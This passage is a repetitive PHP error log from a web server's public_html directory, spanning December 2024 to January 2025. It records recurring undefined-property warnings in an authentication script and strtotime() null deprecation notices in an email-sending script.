/home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Dec-2024 14:27:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Dec-2024 14:53:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Dec-2024 23:06:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Dec-2024 23:50:09 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Dec-2024 23:54:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Dec-2024 23:56:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Dec-2024 23:58:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Dec-2024 23:58:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [18-Dec-2024 02:05:30 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [18-Dec-2024 11:19:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [18-Dec-2024 12:52:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 00:03:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 00:04:41 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Dec-2024 00:04:53 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Dec-2024 01:39:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 01:39:22 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Dec-2024 01:39:32 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Dec-2024 02:29:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 02:45:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 03:03:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 03:17:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 04:10:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 04:15:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 04:39:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 04:54:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 04:56:19 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 05:16:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 05:48:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 05:49:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 05:55:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 07:14:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 07:30:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 09:32:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 09:57:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 10:29:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 11:57:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 12:05:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 14:40:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 23:54:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 23:55:01 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Dec-2024 23:55:11 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Dec-2024 00:11:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Dec-2024 01:25:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Dec-2024 01:25:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Dec-2024 01:53:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Dec-2024 02:03:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Dec-2024 02:14:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Dec-2024 02:16:59 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Dec-2024 02:17:34 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Dec-2024 02:18:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Dec-2024 02:18:19 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Dec-2024 02:18:32 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Dec-2024 02:18:43 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Dec-2024 02:51:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Dec-2024 06:50:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Dec-2024 10:18:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Dec-2024 00:54:11 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Dec-2024 00:56:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Dec-2024 04:13:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Dec-2024 04:15:36 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Dec-2024 05:49:22 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Dec-2024 05:50:24 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Dec-2024 05:50:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Dec-2024 05:51:27 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Dec-2024 05:52:19 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Dec-2024 05:53:09 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Dec-2024 08:20:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Dec-2024 09:17:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Dec-2024 09:19:51 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Dec-2024 09:20:21 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Dec-2024 09:25:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Dec-2024 09:27:20 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Dec-2024 09:27:49 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Dec-2024 09:28:00 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Dec-2024 09:31:02 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Dec-2024 09:34:39 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Dec-2024 09:34:57 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Dec-2024 09:35:30 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Dec-2024 19:24:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Dec-2024 22:44:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Dec-2024 23:00:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Dec-2024 23:06:54 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Dec-2024 23:09:02 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Dec-2024 00:11:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 00:12:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 00:22:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 00:24:39 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Dec-2024 00:24:51 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Dec-2024 00:31:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 00:34:16 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Dec-2024 02:52:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 03:12:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 03:19:22 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Dec-2024 03:23:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 03:28:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 03:31:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 03:31:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 03:33:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 03:34:48 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Dec-2024 03:35:47 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Dec-2024 03:37:02 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Dec-2024 03:37:19 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 03:37:53 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 03:47:28 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Dec-2024 03:47:44 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Dec-2024 03:50:41 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Dec-2024 03:50:58 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Dec-2024 03:51:12 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Dec-2024 03:54:54 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Dec-2024 03:55:18 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Dec-2024 03:55:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Dec-2024 03:56:50 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Dec-2024 04:19:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 04:19:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 04:46:22 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 05:23:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 05:27:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 05:55:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 05:59:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 06:10:56 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Dec-2024 06:11:40 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Dec-2024 06:12:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 06:43:56 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 06:45:40 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Dec-2024 07:09:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 07:30:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 07:34:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 07:39:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 08:30:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 10:50:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 10:51:23 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Dec-2024 11:00:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 22:13:53 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Dec-2024 23:37:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Dec-2024 05:37:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Dec-2024 05:51:15 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Dec-2024 05:51:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Dec-2024 05:51:57 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Dec-2024 05:52:12 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Dec-2024 06:12:02 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [30-Dec-2024 00:39:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [30-Dec-2024 00:54:43 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [30-Dec-2024 00:54:57 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [30-Dec-2024 00:57:18 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [01-Jan-2025 08:12:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [01-Jan-2025 16:21:09 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [02-Jan-2025 01:45:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [02-Jan-2025 01:47:07 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [02-Jan-2025 06:49:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [02-Jan-2025 06:51:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [02-Jan-2025 10:02:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [03-Jan-2025 02:05:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [03-Jan-2025 05:11:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [03-Jan-2025 05:12:50 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [03-Jan-2025 05:13:06 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [03-Jan-2025 05:13:19 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [03-Jan-2025 05:14:00 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [03-Jan-2025 05:14:12 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [03-Jan-2025 05:15:35 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [03-Jan-2025 05:16:39 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [03-Jan-2025 05:18:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [03-Jan-2025 12:59:11 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [04-Jan-2025 07:08:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [04-Jan-2025 07:12:01 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:12:22 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:12:39 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:13:04 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:13:18 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:13:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:13:56 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:14:10 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:14:19 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:14:29 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:14:39 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:14:57 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:15:15 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:16:04 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:16:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:16:57 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:17:05 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:17:13 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:17:23 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:17:32 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:17:45 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 